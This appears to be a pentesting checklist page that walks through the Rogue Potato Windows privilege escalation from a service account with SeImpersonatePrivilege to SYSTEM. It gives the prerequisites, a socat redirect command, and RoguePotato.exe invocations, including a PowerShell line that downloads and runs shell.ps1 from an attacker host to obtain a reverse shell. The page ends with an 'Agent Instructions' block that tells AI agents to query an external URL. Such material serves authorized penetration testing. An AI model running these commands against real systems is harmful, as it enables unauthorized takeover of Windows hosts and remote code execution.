# Rogue Potato

### Overview

**Rogue Potato** is a **Windows local privilege escalation technique** that abuses **NTLM authentication and token impersonation** to escalate from a **low-privileged service account** to **NT AUTHORITY\SYSTEM**.

It is part of the **“Potato” attack family**, designed to **bypass patches that broke Juicy Potato**, especially on **Windows 10 and Server 2019+**.

### Why Rogue Potato Works

Windows allows certain services to:

* **Impersonate clients**
* **Accept NTLM authentication**
* **Create access tokens**

Rogue Potato:

1. Forces a **SYSTEM service** to authenticate back to the attacker
2. Captures the authentication
3. **Impersonates the SYSTEM token**
4. Executes attacker-controlled code as SYSTEM

### Prerequisites

1. Local Code Execution
2. Must have **at least one**:
   * `SeImpersonatePrivilege` ✅ (most common)
   * `SeAssignPrimaryTokenPrivilege` 
3. Rogue Potato works best when running as:
   * IIS AppPool identity
   * MSSQL service account
   * Any service account with impersonation rights
4. You need to have a machine under your control where you can perform the redirect and this machine must be accessible on **port 135** by the victim.
5. If the machine is >= `Windows 10 1809` & `Windows Server 2019`

### Steps

1. Check Token Privileges (`SeImpersonatePrivilege` must be present):

   ```bash
   whoami /priv
   ```
2. Upload a copy of `RoguePotato.exe` and upload it to the victim machine.
3. Start `socat` on the Kali box listening on TCP 135 and redirecting back to the victim machine on TCP 9999.

   ```bash
   socat tcp-listen:135,reuseaddr,fork tcp:<VICTIM_IP>:9999
   ```
4. Execute Rogue Potato:

   ```bash
   # -r 10.10.14.9 - This is a required option that will identify my host;
   # -l 9999 - The port to listen on locally(This will run the RogueOxidResolver);
   # -e cmd.exe ping 10.10.14.9 - The command to run, starting simple.
   .\RoguePotato.exe -r <ATTACKER_IP> -e "cmd.exe /c ping <ATTACKER_IP>" -l 9999

   # Get a reverse shell back. Set up a listener in attacker machine to catch it.
   .\RoguePotato.exe -r <ATTACKER_IP> -e "powershell -c iex( iwr http://<ATTACKER_IP>/shell.ps1 -UseBasicParsing )" -l 9999
   ```

### References

1. <https://github.com/antonioCoco/RoguePotato>
2. <https://0xdf.gitlab.io/2020/09/08/roguepotato-on-remote.html>
3. <https://jlajara.gitlab.io/Potatoes_Windows_Privesc#roguePotato>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/windows-privilege-escalation/potato-attacks/rogue-potato.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.